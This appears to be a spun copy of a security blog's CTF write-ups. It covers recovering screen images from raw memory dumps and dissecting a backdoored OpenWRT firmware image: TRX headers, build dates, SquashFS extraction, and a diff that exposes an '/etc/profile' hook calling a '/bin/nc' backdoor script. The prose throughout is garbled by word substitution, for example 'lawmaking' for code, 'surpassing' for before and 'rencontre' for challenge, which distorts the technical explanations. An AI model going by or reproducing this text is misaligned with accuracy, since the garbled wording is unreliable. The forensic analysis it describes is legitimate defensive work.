picture can be hands spotted: they're upside lanugo considering that's the way BMP's are stored:</li></ul><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-0Cu1V3u-KdA/VO7PhZfWxJI/AAAAAAAAA-M/OHBDS9jAVPI/s1600/mspaint3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-0Cu1V3u-KdA/VO7PhZfWxJI/AAAAAAAAA-M/OHBDS9jAVPI/s1600/mspaint3.PNG" height="260" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">We need upside lanugo backdoors "this big"<br /><br /></td></tr></tbody></table></div><ul><li>The most interesting artifacts were placid from the <a href="https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2">Coor Coor dump</a>. The user was running a TrueCrypt container inside VirtualBox and without some offset welding we can see the Pidgin Window, the user worth (testicool69@yodawg.9447.plumbing) and a few OTR settings:</li></ul><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-Co9_LF3D41k/VO7RPpaKufI/AAAAAAAAA-Y/sMZ9nbSAMoE/s1600/Capturar.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://3.bp.blogspot.com/-Co9_LF3D41k/VO7RPpaKufI/AAAAAAAAA-Y/sMZ9nbSAMoE/s1600/Capturar.PNG" height="174" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">While True: width ++ || width--</td></tr></tbody></table><br />Notice that the Windows are not perfectly aligned here, but we can see the data by zooming in:<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-K8aXR1-YKHU/VO7RVCGTzQI/AAAAAAAAA-g/arzbR9kpgCg/s1600/2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://2.bp.blogspot.com/-K8aXR1-YKHU/VO7RVCGTzQI/AAAAAAAAA-g/arzbR9kpgCg/s1600/2.PNG" height="347" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Enhance pls</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-CO8pfXzdOTQ/VO8kNwTDi8I/AAAAAAAAA_I/urdpioJWy08/s1600/zoom.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://4.bp.blogspot.com/-CO8pfXzdOTQ/VO8kNwTDi8I/AAAAAAAAA_I/urdpioJWy08/s1600/zoom.PNG" height="266" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://hsto.org/storage2/b52/91b/ba7/b5291bba7250abd12010644ca848dd75.jpg">Looks like our killer is screwed. YEEAAAH.</a></td></tr></tbody></table><br />We can moreover spot the Window taskbar, just like the volatility <a href="https://github.com/volatilityfoundation/volatility/wiki/Command%20Reference%20Gui#screenshot">screenshot plugin</a>&nbsp;showed us on the <a href="http://w00tsec.blogspot.com/2014/11/9447-2014-ctf-write-up-coor-coor.html">previous write-up</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-gVu9lB639W8/VO7St0SpR4I/AAAAAAAAA-s/Uckg7hiF9j8/s1600/window.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-gVu9lB639W8/VO7St0SpR4I/AAAAAAAAA-s/Uckg7hiF9j8/s1600/window.PNG" height="425" width="640" /></a></div><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-Kc3tz5eQYn8/VHuHZUt-GUI/AAAAAAAAAvU/EibDp3i3mYc/s1600/session_0.WinSta0.Default.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://2.bp.blogspot.com/-Kc3tz5eQYn8/VHuHZUt-GUI/AAAAAAAAAvU/EibDp3i3mYc/s1600/session_0.WinSta0.Default.png" height="227" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">python vol.py -f challenge.vmem screenshot -D screenshot/</td></tr></tbody></table><br />It's moreover possible to spot icons from the running programs, like this one from Virtualbox:<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-pZTLt-oeXOI/VO8hLY6QIyI/AAAAAAAAA-8/0bjL9UY1OG8/s1600/vbox.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://1.bp.blogspot.com/-pZTLt-oeXOI/VO8hLY6QIyI/AAAAAAAAA-8/0bjL9UY1OG8/s1600/vbox.PNG" height="266" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">VirtualBox <a href="http://www.eightforums.com/attachments/virtualization/6578d1339062148t-vbox-ose-windows-xp-vista-7-8-64-bit-virtualbox.png">icon</a></td></tr></tbody></table><br /><br /><b>Conclusion</b><br /><br />This technique is very worldwide among ROM hackers as they try to find image patterns inside raw game dumps.Trammelsmy <a href="http://w00tsec.blogspot.com/2014/10/hacklu-2014-ctf-write-up-at-gunpoint.html">write-up from Hack.lu 2014 CTF</a> to find increasingly well-nigh it. By the way, you can moreover use <a href="http://www.romhacking.net/utilities/991/">Tile Molester</a>&nbsp;instead of GIMP to scan the RAW data.<br /><div><br /></div>You may be asking - why not whittle the dumps using binwalk and foremost or pericope them using the <a href="https://github.com/volatilityfoundation/volatility/wiki/Command%20Reference#dumpfiles">dumpfiles</a> volatility module? If you try it yourself you will notice that they won't find the magic bytes for all those images.<br /><br />As far as I know, there's no off-the-shelf tool to automagically pericope them, but it should't be that nonflexible to write a binwalk/volatility plugin for this based on some heuristics. Binwalk, for example, can find <a href="https://github.com/devttys0/binwalk/blob/b131b7cda7d067897901a5a29dc0cdb8ca69efcb/src/binwalk/modules/compression.py">raw deflate/lzma</a> streams by towers headers on top of the raw compressed data and writing it when do disk.<br /><br />I'm no Computer Visualization expert, but here's a few suggestions:<br /><br /><ul><li>Set the image width to worldwide exhibit resolutions. The taskbar from the coor coor memory dump could be displayed by setting the width to 1440 points (1440x900 is a worldwide screen resolution).</li><li>Use worldwide window background/patterns as a template to find interesting sections.</li><li>Create a multi-view/side-by-side RAW image browser based on <a href="https://github.com/GNOME/gimp/blob/cd99314572504bcbcbc9b82035e45fcd95d7d9d5/plug-ins/common/file-raw-data.c">GIMP source code</a>&nbsp;(multiple image types, multiple widths etc).</li><li>Use Google's strained smart-ass to <a href="http://www.wired.com/2012/06/google-x-neural-network/">find cat videos</a>.</li><li>Get a worthier monitor (yeah, it helps).</li></ul><br />I hope you all use these skills wisely, lamister any kind of superfishal investigation like our Lenovo friends.<br /><br /><a href="https://imgur.com/V4zfOZX"><img height="400" src="https://i.imgur.com/V4zfOZX.png" width="640" /></a><br /><br /><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com11tag:blogger.com,1999:blog-3296471108082693838.post-15976814769181824682015-02-09T11:49:00.000-02:002015-05-04T23:57:38.187-03:00Firmware Forensics: Diffs, Timelines, ELFs and BackdoorsThis post covers some worldwide techniques that I use to unriddle and reverse firmware images. These techniques are particularly useful to dissect malicious firmwares, spot backdoors and snift unwanted modifications.<br /><br />Backdooring and re-flashing firmware images is rhadamanthine mainstream: malicious guys are infecting embedded devices and inserting trojans in order to unzip persistence. Recent wares covered the increasing number of <a href="http://www.net-security.org/malware_news.php?id=2917">trojanized android firmwares</a> and <a href="http://securelist.com/blog/research/67794/state-of-play-network-devices-facing-bulls-eye/">routers that are stuff permanently modified</a>.<br /><br />Attackers with a privileged network position may MITM your requests and forge fake updates containing malicious firmwares. Writing <a href="https://github.com/infobyte/evilgrade">Evilgrade</a>&nbsp;modules for this is really simple, as most vendors alimony <a href="http://dnlongen.blogspot.com.br/2014/10/CVE-2014-2718-Asus-RT-MITM.html">failing to unhook updates securely</a>, right <a href="http://w00tsec.blogspot.com/2014/07/hacking-asus-rt-ac66u-and-preparing-for.html">ASUS</a>?<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-B6H16E5rNDw/VHf3xxFR1KI/AAAAAAAAAu4/cOoYDoKFivs/s1600/22.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="310" src="http://2.bp.blogspot.com/-B6H16E5rNDw/VHf3xxFR1KI/AAAAAAAAAu4/cOoYDoKFivs/s1600/22.PNG" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">All your HTTP packets are vest to us...</td></tr></tbody></table>Older versions of ASUS firmwares were vulnerable to MITM attacks (<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2718">CVE-2014-2718</a>) considering it transmitted updates over HTTP and there were no security/signature checks. ASUS silently patched the issue on&nbsp;3.0.0.4.376+ and they're now <a href="https://github.com/RMerl/asuswrt-merlin/blob/042f83715c5951e291a83ce7d967c3372a392a26/release/src/router/rom/webs_scripts/nozip_webs_upgrade.sh#L75-L96">verifying RSA signatures</a>&nbsp;via /sbin/rsasign_check.:<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-ZdhOjK1rjLA/VNhSX8WfJ2I/AAAAAAAAA5g/MDmqKOhO9SU/s1600/asus_rsa.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="336" src="http://1.bp.blogspot.com/-ZdhOjK1rjLA/VNhSX8WfJ2I/AAAAAAAAA5g/MDmqKOhO9SU/s1600/asus_rsa.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Valid signature -&gt; nvram_set("rsasign_check", "1")</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"></div><br /><b>NoConName 2014 CTF Finals: Vodka</b><br /><br />I'll alimony my <a href="http://w00tsec.blogspot.com/2014/07/hacking-asus-rt-ac66u-and-preparing-for.html">tradition</a> of writing posts based on CTF challenges considering <strike>everybody upvotes CTF posts on reddit</strike>&nbsp;it's cool.<br /><br />The rencontre "<a href="https://github.com/MarioVilas/write-ups/tree/master/ncn-ctf-2014/Vodka">Vodka</a>", from <a href="https://twitter.com/noconname">NoConName 2014</a> CTF Finals was created by <a href="https://twitter.com/MarioVilas">@MarioVilas</a>, who kindly provided the files <a href="https://github.com/MarioVilas/write-ups/tree/master/ncn-ctf-2014/Vodka">here</a> (thanks dude!).<br /><br />I did not participate on the CTF finals, but I found the rencontre really interesting considering there were many variegated ways to solve it, summarizing the deportment needed to inspect a compromised firmware. In my opinion, the weightier CTF challenges are the ones that require us to&nbsp;<a href="https://github.com/ctfs/write-ups/tree/master/hack-lu-ctf-2014/hotcows-dating">develop/use new techniques</a>&nbsp;and&nbsp;<a href="https://twitter.com/cherepanov74/status/525617612559249408">improve existing tools</a>.<br /><br />NoConName 2014 Finals: Vodka<br />Challenge Category: Forensics<br />Description:&nbsp;No hints :( just get the flag. <br /><br />This rencontre unravelment is not very intriguing, so I hired a couple of marketing specialists to <strike>design a new logo</strike>&nbsp;add some Infosec drama and reformulate it:<br /><br /><div class="code">A mysterious bug unauthentic one of the cadre routers at a major Internet service provider in Syria. The failure of this router caused the whole country to suddenly lose all connection to the Internet. The Syrian government recorded a traffic capture right surpassing the crash and hired you to perform a forensic analysis.</div><br />Download provided:&nbsp;<a href="https://github.com/MarioVilas/write-ups/blob/master/ncn-ctf-2014/Vodka/vodka">https://github.com/MarioVilas/write-ups/blob/master/ncn-ctf-2014/Vodka/vodka</a><br /><br /><br /><b>Network Forensics</b><br /><br />The download provided is a packet capture using the PCAP-NG format. Wireshark is too mainstream, so let's <a href="http://pcapng.com/">convert the PCAP-NG to PCAP</a> and unshut it using&nbsp;<a href="http://www.netresec.com/?page=Networkminer">Network Miner</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-s9TwxKwnI7c/VGLg9RTvq2I/AAAAAAAAAr4/-yMBtpyje4c/s1600/tftp1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="http://4.bp.blogspot.com/-s9TwxKwnI7c/VGLg9RTvq2I/AAAAAAAAAr4/-yMBtpyje4c/s320/tftp1.PNG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-eC8fEs6cGjI/VGLhAV4-00I/AAAAAAAAAsA/cyBLFdEMImA/s1600/tftp2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="http://1.bp.blogspot.com/-eC8fEs6cGjI/VGLhAV4-00I/AAAAAAAAAsA/cyBLFdEMImA/s640/tftp2.PNG" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Network Miner makes it very easy for us to understand what's going on: there's some sort of file transfer via TFTP and the filename seems to be related to an OpenWRT firmware image.<br /><b><br /></b><b><br /></b><b>Firmware structure</b><br /><br />We unchangingly <a href="https://twitter.com/bernardomr/status/530532003498971136">binwalk all the things</a> but very few people stop to unriddle and understand the firmware structure properly. We know that the firmware image was downloaded using TFTP, a worldwide way used by many routers to transfer config files/updates and it is probably based on the <a href="https://www.openwrt.org/">OpenWRT project</a>.<br /><br />So what does binwalk tell us?<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-T5rzISWOw30/VM0xGWvnbcI/AAAAAAAAAyc/40srgJC5ypg/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="http://2.bp.blogspot.com/-T5rzISWOw30/VM0xGWvnbcI/AAAAAAAAAyc/40srgJC5ypg/s1600/Screenshot-Terminal.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-yXmAB2_TuDI/VNF-qDhKAUI/AAAAAAAAA0U/ZaALwUJ4HjU/s1600/firm.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="http://1.bp.blogspot.com/-yXmAB2_TuDI/VNF-qDhKAUI/AAAAAAAAA0U/ZaALwUJ4HjU/s1600/firm.PNG" width="640" /></a></div><br />The <a href="http://wiki.openwrt.org/doc/techref/bootloader/cfe">Commom Firmware Environment</a> (CFE) is a firmware interface/bootloader present on Broadcom SOCs. It is matching to the BIOS on PC platforms and it is responsible for CPU initialization and bootstrap lawmaking on embedded processors. The CFE is moreover referred as PMON and it is often mapped to <a href="https://en.wikipedia.org/wiki/Memory_Technology_Device">mtd0</a>.<br /><br />The JFFS2/NVRAM filesystem is the non-volatile partition. They store all the configuration parameters, including router settings, passwords and logs.<br /><br />Bear in mind firmware updates often do not include the CFE/NVRAM partition. You can wangle the CFE panel using serial and you can moreover dump them on a live system using DD or via <a href="http://goodfet.sourceforge.net/apps/spi/">SPI</a>. Let's focus on the firmware sections included on the provided image (openwrt-wrtsl54gs-squasfs.bin):<br /><b><br /></b><b>TRX (Offset 0x20)</b><br /><br />The TRX header is just an encapsulation, describing a series of information from the firmware, including the image size, CRC, flags, version information and partition offsets. Binwalk wasn't recognizing the header and the relative offsets properly so I submitted <a href="https://github.com/devttys0/binwalk/pull/106">these</a>&nbsp;<a href="https://github.com/devttys0/binwalk/pull/107">two</a> pull requests.&nbsp;Creating <a href="https://github.com/devttys0/binwalk/wiki/Creating-Custom-Signatures">custom signatures</a> for binwalk is pretty straightforward.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-4dCX8ezR0h4/VNQyv491cWI/AAAAAAAAA24/58JmMSdmCDQ/s1600/Screenshot-Terminal-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://4.bp.blogspot.com/-4dCX8ezR0h4/VNQyv491cWI/AAAAAAAAA24/58JmMSdmCDQ/s1600/Screenshot-Terminal-00.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Some firmwares (like the newer ones from ASUS and Netgear) use this TRX structure but don't include a loader: the Linux Kernel and the RootFS may be shifted on this occasion.<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-4kLOoPuD7b0/VNYad2p4gdI/AAAAAAAAA3U/0GbiVVfaBcQ/s1600/trx-loader.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="http://1.bp.blogspot.com/-4kLOoPuD7b0/VNYad2p4gdI/AAAAAAAAA3U/0GbiVVfaBcQ/s1600/trx-loader.png" width="400" /></a></div><br />If the firmware includes any uneaten header surpassing the TRX, you have to sum their size with the displayed partition offsets in order to find the real values. Some firmwares for SOHO modems out there won't include it, so these values should be right on most cases. The downloaded OpenWRT image had the pursuit offsets:<br /><br /><ul><li>Loader: 0x20 + 0x1C = 0x3C</li><li>Kernel: &nbsp;0x20 + 0x8D8 = 0x8F8</li><li>RootFS: 0x20 + 0x7E400 = 0x7E420</li></ul><br />In this specific case, we have a <a href="http://wiki.openwrt.org/doc/techref/header">BinHeader</a> right surpassing the TRX, indicating the workbench ID, the FWStageand the Hardware Date. The struct is described on <a href="https://github.com/mirror/dd-wrt/blob/master/src/include.v24/cyutils.h">cyutils.h</a>:<br /><br /><script src="https://gist.github.com/bmaia/3feab2fe6234a1e59deb.js"></script>This uneaten header appears on a few routers like the WRT54G series: the Web GUI checks for this pattern surpassing unquestionably writing the firmware.<br /><br /><a href="http://4.bp.blogspot.com/-rnZD1G-hN1w/VNA4H88OxiI/AAAAAAAAAzE/vCUP8HeyjEc/s1600/hex.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="146" src="http://4.bp.blogspot.com/-rnZD1G-hN1w/VNA4H88OxiI/AAAAAAAAAzE/vCUP8HeyjEc/s1600/hex.PNG" width="640" /></a><br /><br />We are particularly interested on the fwdate field (Firmware Date), well-balanced by the hex values 07 02 03.Equalto <a href="https://dev.openwrt.org/browser/trunk/tools/firmware-utils/src/addpattern.c">addpattern.c</a>, the first byte defines the year, the second one is the month and the third byte refers to the day the firmware was created. The fwdate seems to be 03-February-2007, save that for later, we will need that =)<br /><br /><b>GZ'd LZMA Loader (Offset 0x3C)</b><br /><br />According to <a href="http://wiki.openwrt.org/doc/techref/flash.layout">OpenWRT Wiki</a>, the marching loader has no concept of filesystems: it assumes that the start of the TRX data section is executable code.<br /><br />The marching loader boots into an LZMA program which decompresses the kernel into RAM and executes it. It turns out the marching loader does know gzip compression, so we have a gzip-compressed LZMA decompression program at 0x3C.<br /><br />You can find the source lawmaking for this <a href="https://dev.openwrt.org/browser/trunk/target/linux/brcm-2.4/image/lzma-loader/src?rev=11275">lzma-loader here</a>&nbsp;and <a href="https://downloads.openwrt.org/sources/loader-0.04.tar.gz">here</a>. Note the <a href="https://dev.openwrt.org/browser/trunk/target/linux/brcm-2.4/image/lzma-loader/src/Makefile?rev=11275">TEXT_START offset</a> at&nbsp;0x80001000: we may need to retread the LoadingWriteon our Disassembler in order to reverse the compiled loader. Don't forget to decompress it (gunzip) surpassing reversing the file.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-9BjGeqpZu04/VNBAI_w5iRI/AAAAAAAAAzU/7yVrEyWn2mY/s1600/offset.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://1.bp.blogspot.com/-9BjGeqpZu04/VNBAI_w5iRI/AAAAAAAAAzU/7yVrEyWn2mY/s1600/offset.PNG" width="155" /></a><a href="http://2.bp.blogspot.com/-H9JC5JnXwaA/VNBEoJGiUTI/AAAAAAAAAzg/Rd7OebY2nyA/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="http://2.bp.blogspot.com/-H9JC5JnXwaA/VNBEoJGiUTI/AAAAAAAAAzg/Rd7OebY2nyA/s1600/1.PNG" width="400" /></a></div><br />Most embedded toolchains would strip the binaries in order to reduce the firmware size. If you want to reverse a friendlier version of the loader, grab the latest <a href="https://downloads.openwrt.org/barrier_breaker/14.07/brcm47xx/generic/OpenWrt-ImageBuilder-brcm47xx_generic-for-linux-x86_64.tar.bz2">OpenWRT ImageBuilder</a>&nbsp;and search for loader.elf:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-MIsP3HMUqQY/VNBIEHainKI/AAAAAAAAAz0/Gv9fODp_9E4/s1600/Screenshot-Terminal-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="http://3.bp.blogspot.com/-MIsP3HMUqQY/VNBIEHainKI/AAAAAAAAAz0/Gv9fODp_9E4/s1600/Screenshot-Terminal-4.png" width="400" /></a></div><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-l69EaHyuXkY/VNBEoEOM1YI/AAAAAAAAAzk/F_u1MPHcIlQ/s1600/2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="257" src="http://1.bp.blogspot.com/-l69EaHyuXkY/VNBEoEOM1YI/AAAAAAAAAzk/F_u1MPHcIlQ/s1600/2.PNG" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Woohoo, undecorous lawmaking =)</td></tr></tbody></table><br />Note that if we modify the loader to include a backdoor, we would have our very own Router&nbsp;<a href="https://en.wikipedia.org/wiki/Rootkit#Bootkits">Bootkit</a>,&nbsp;cool isn't it?<br /><br /><b>LZMA'd Kernel (Offset 0x8F8)</b><br /><br />Instead of just putting a kernel directly onto flash, most embedded devices shrink the kernel using LZMA. The marching loader boots into an LZMA program which decompresses the kernel into RAM and executes it.<br /><br />Binwalk has a <a href="https://github.com/devttys0/binwalk/blob/5404839534c9ea6000f85d13664d84a19418fa11/src/binwalk/magic/linux">signature</a>&nbsp;to find Kernel strings in raw Linux Kernels. The identified string lists the toolchain used to compile the Kernel, as well as the compiled stage and version information:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-RkIAutGouFg/VNFXOvHGh4I/AAAAAAAAA0E/ymh47GhKJog/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="http://1.bp.blogspot.com/-RkIAutGouFg/VNFXOvHGh4I/AAAAAAAAA0E/ymh47GhKJog/s1600/Screenshot-Terminal-5.png" width="400" /></a></div><br />And why did binwalk manage to find all these information from the Kernel? The wordplay can be found on the <a href="https://dev.openwrt.org/browser/branches/whiterussian/openwrt/toolchain/gcc/Makefile#L82">toolchain's Makefile</a>:<br /><br /><script src="https://gist.github.com/bmaia/154fb3df62ebd1947a9b.js"></script>If we follow the steps from my <a href="http://w00tsec.blogspot.com.br/2014/02/analyzing-malware-for-embedded-devices.html">previous post</a>&nbsp;we can build a customized Kernel for OpenWRT. The generated <a href="https://en.wikipedia.org/wiki/Vmlinux">vmlinux</a>&nbsp;is often an ELF file, but in our case, the object was <a href="https://dev.openwrt.org/browser/branches/whiterussian/openwrt/target/linux/linux-2.4/Makefile#L349">stripped using objcopy</a>:<br /><br /><script src="https://gist.github.com/bmaia/3dd9d0579bf9b967e3a8.js"></script> Did you notice the compile stage was 03-February-2007? Let's save that for later as well.<br /><br /><b>SquashFS (Offset 0x72420)</b><br /><br />The last part is the very filesystem. Most embedded Linux devices use SquashFS and many vendors hack it in order to get largest pinch and faster performance. Hopefully we don't have to worry well-nigh that as&nbsp;<a href="http://www.devttys0.com/2014/08/mucking-about-with-squashfs/">Sasquatch</a>&nbsp;handles variegated SquashFS header/compression formats.<br /><br />The filesystem has the standard OpenWRT directories and files, including a imprint from the 0.9 build (White Russian).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/--JqQ_XocJEE/VNGDirAqYJI/AAAAAAAAA0s/nh38Ixl9YlM/s1600/Screenshot-Terminal-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="http://4.bp.blogspot.com/--JqQ_XocJEE/VNGDirAqYJI/AAAAAAAAA0s/nh38Ixl9YlM/s1600/Screenshot-Terminal-7.png" width="400" /></a></div><br />Both binwalk and sasquatch exhibit the SquashFS superblock information, including the creation/last suspend time:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-gTdsk89oeb0/VNGBRTVQC1I/AAAAAAAAA0g/MpE_LLgK06s/s1600/Screenshot-Terminal-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="http://4.bp.blogspot.com/-gTdsk89oeb0/VNGBRTVQC1I/AAAAAAAAA0g/MpE_LLgK06s/s1600/Screenshot-Terminal-6.png" width="400" /></a></div><br />Did you spot the stage 29-October-2014? There's definitely something going on here =)<br /><br /><b style="text-align: center;"><br /></b><b style="text-align: center;">Directory TreeUnequal&amp; Fuzzy Hashing</b><br /><br />Now that we have unpacked &amp; unsquashed the firmware, let's use <a href="https://github.com/bmaia/binwally">binwally</a>&nbsp;to compare the&nbsp;directory tree and find the needle in the haystack.<br /><br />After googling the filename (openwrt-wrtsl54gs-squashfs.bin), we get three possible candidates:<br /><br />-&nbsp;<a href="https://downloads.openwrt.org/whiterussian/0.9/default/openwrt-wrtsl54gs-squashfs.bin">https://downloads.openwrt.org/whiterussian/0.9/default/openwrt-wrtsl54gs-squashfs.bin</a><br />-&nbsp;<a href="https://downloads.openwrt.org/whiterussian/0.9/micro/openwrt-wrtsl54gs-squashfs.bin">https://downloads.openwrt.org/whiterussian/0.9/micro/openwrt-wrtsl54gs-squashfs.bin</a><br />-&nbsp;<a href="https://downloads.openwrt.org/whiterussian/0.9/pptp/openwrt-wrtsl54gs-squashfs.bin">https://downloads.openwrt.org/whiterussian/0.9/pptp/openwrt-wrtsl54gs-squashfs.bin</a><br /><br />OpenWRT offers variegated builds for the same device considering of constraints like limited wink size. Let's download these three candidates, unpack and compare them:<br /><br /><div class="code">binwally.py ctf/_openwrt-wrtsl54gs-squashfs.bin.extracted/ micro/_openwrt-wrtsl54gs-squashfs.bin.extracted/</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-LizrFkRxHAU/VNGOeeAiEvI/AAAAAAAAA08/MdElWp9w60Y/s1600/binwally.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="http://2.bp.blogspot.com/-LizrFkRxHAU/VNGOeeAiEvI/AAAAAAAAA08/MdElWp9w60Y/s1600/binwally.png" width="400" /></a></div><br />The "micro" build has the highest overall match score (99%), let's spot the differences:<br /><br /><div class="code">binwally.py ctf/_openwrt-wrtsl54gs-squashfs.bin.extracted/ micro/_openwrt-wrtsl54gs-squashfs.bin.extracted/ | grep -E -v "ignored|matches"</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-kKKDQMQ45kY/VNGO5yMW6jI/AAAAAAAAA1E/xx7ryC0jQU4/s1600/binwally2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="http://3.bp.blogspot.com/-kKKDQMQ45kY/VNGO5yMW6jI/AAAAAAAAA1E/xx7ryC0jQU4/s1600/binwally2.png" width="400" /></a></div><br />After thoughtfully reviewing these files, we notice that the "/etc/profile" was modified to include a undeniability to the nc backdoor.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cUbwigQTadU/VNGae467RBI/AAAAAAAAA10/jotqrVy69n8/s1600/diff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="77" src="http://4.bp.blogspot.com/-cUbwigQTadU/VNGae467RBI/AAAAAAAAA10/jotqrVy69n8/s1600/diff.png" width="400" /></a></div><br />The LZMA'd Kernel (offset 0x8F8) is the same on both images, plane though binwally reports a difference. This happens considering binwalk extraction doesn't know when to stop and both files moreover contain spare data like the SquashFS partition.<br /><br />The backstairs located at "/bin/nc" is a simple whack script that checks the MD5 from "/etc/profile" and draws a Nyan Cat withal with the rencontre key. In order to get the proper key, we simply modify the file location to the relative path "./etc/banner", to stave overlapping with the file from the original system.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-dRoI4tlRbBU/VNGWxRY8ozI/AAAAAAAAA1o/e_ynv4FitRI/s1600/backdoor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="http://2.bp.blogspot.com/-dRoI4tlRbBU/VNGWxRY8ozI/AAAAAAAAA1o/e_ynv4FitRI/s1600/backdoor.png" width="400" /></a></div><br />After running the file, we get the 